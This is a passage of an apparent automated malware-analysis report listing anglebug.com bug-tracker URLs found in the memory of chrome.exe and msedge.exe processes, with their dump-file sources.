              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3832
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3862
              Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3862r
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3965
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3970
              Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3970J
              Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3970S
              Source: msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3970v
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4324
              Source: msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4384
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4405
              Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4405x
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4428
              Source: msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4428v
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4551
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4633
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4722
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4836
              Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4836M
              Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4836p
              Source: msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4836v
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4937
              Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4937v
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5007
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5055
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5061
              Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5061(
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5281
              Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5281z
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5371
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5375
              Source: chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5375a
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5421
              Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5421O
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5430
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5535
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5658
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5750
              Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5881
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5901
              Source: msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906
              Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906&
              Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/59060
              Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/59061
              Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906G
              Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906H
              Source: msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906S
              Source: msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906v
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6041
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6048
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6141
              Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/61415
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6248
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6439
              Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6439s
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6651
              Source: msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6651v
              Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6692
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6755
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6860
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6876
              Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6878
              Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6929
